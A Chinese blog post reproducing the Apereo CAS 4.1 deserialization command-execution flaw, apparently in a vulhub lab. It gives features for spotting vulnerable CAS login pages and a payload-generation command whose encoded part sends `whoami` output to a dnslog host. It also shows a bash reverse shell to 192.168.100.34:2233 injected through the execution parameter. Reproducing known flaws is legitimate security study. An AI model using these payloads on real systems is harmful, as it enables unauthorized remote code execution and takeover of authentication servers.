楼主困了,这里就直接写上楼主自己的一些操作
详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现

特征:

1、网站根目录下有cas目录
2、如图所示,有apereo CAS图标

3、如图所示,有execution传参

一、先跑下目录

二、生成payload

http://www.jackson-t.ca/runtime-exec-payloads.html

工具链接:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

三、dnslog回显

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,Y3VybCBgd2hvYW1pYC45dzJ3Z2YuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}"
标记部分就是生成的payload

然后我们登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送:

成功回显

五、反弹shell

和第四步一样的

把这个拿去编码后,替换,发包
bash -i >& /dev/tcp/192.168.100.34/2233 0>&1

成功反弹

【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现相关推荐

  1. 03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞

    文章目录 漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞 影响版本 漏洞原理 漏洞复现 环境准备 漏洞检测 漏洞利用 验证漏洞利用是否成功 修复建议 漏洞名称:Apereo CAS 4. ...

  2. Apereo CAS 4.1 反序列化命令执行漏洞复现

    文章目录 1. 前言 2. 利用 参考 1. 前言 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统.其4.1.7版本之前存在一处默认密钥的问题,利用这个默认 ...

  3. 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

    脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...

  4. Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker

    Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...

  5. Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)

    Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未 ...

  6. wpf window 不执行show 就不能load执行_Numpy反序列化命令执行漏洞分析(CVE-2019-6446)附0day...

    1.介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy 提供大量的 函数和操作,能够帮助程序员便利进行数值计算.在 NumPy 1.16.0 版本之前存在反序列 ...

  7. FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)

    #FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...

  8. python pickle反序列化漏洞_Numpy反序列化命令执行漏洞分析(CVE-2019-6446) –vr_system...

    1. 介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy提供大量的函数和操作,能够帮助 程序员 便利进行数值计算.在NumPy 1.16.0版本之前存在反序列化 ...

  9. CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

    CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 本文仅为验证漏洞,在本地环境测试验证,无其它目的 漏洞编号: ...

最新文章

  1. 联邦学习fate笔记小结
  2. 场景解析--Pyramid Scene Parsing Network
  3. 爬虫抓取页面数据原理(php爬虫框架有很多 )
  4. 特性(C# 和 Visual Basic)
  5. 简单理解Ext.DomQuery操作CSS3选择器
  6. 003_推箱子-事件
  7. mysql列宽设置,mysql – 从.csv文件确定最佳列宽
  8. 【常用】截取相机图片截图功能
  9. 03_MyBatis基本查询,mapper文件的定义,测试代码的编写,resultMap配置返回值,sql片段配置,select标签标签中的内容介绍,配置使用二级缓存,使用别名的数据类型,条件查询ma
  10. 企业的核心竞争力是什么
  11. linux内核镜像解压,解压内核镜像
  12. Vmware中mac snow leopard蘋果雪豹系統驅動程式安裝方法
  13. mac编辑器coda使用小贴条
  14. Spring Boot学习总结(10)——SpringBoot打包成Docker镜像
  15. win7旗舰版梦幻主题补丁~完美你的桌面
  16. 用DOS写一个简单的虚拟WIFI工具,CMD电脑无线WIFI工具,BAT实现WIFI和自动关机
  17. python11——随机点名
  18. 不重装系统改硬盘模式: RAID ON 改成 AHCI
  19. 社区实践 | Kube-OVN实现K8s多租户网络管理
  20. 微信支付服务器繁忙,微信转不了账了怎么回事?微信转账显示系统繁忙怎么办?...

热门文章

  1. 如何用HTML5做虎牙直播,怎样做游戏主播 虎牙直播简明使用教程
  2. 精品MySQL面试题,备战八月99%必问!过不了面试算我的
  3. linux unrar 密码,linux下使用unrar命令解压*.rar格式文件(示例代码)
  4. 视频教程-自然语言处理实战——情感分析-NLP
  5. 西南交大计算机学校地址,西南交通大学
  6. Bugku-江湖魔头(web)
  7. USB在WINDOWS下的驱动开发
  8. 《c primer plus》学习笔记第一章 :初识c语言
  9. 头歌(educoder)第 4 章 Java入门之方法 Java入门 - 方法的使用
  10. SRS视频服务器-docker部署srs4.0:带SRT功能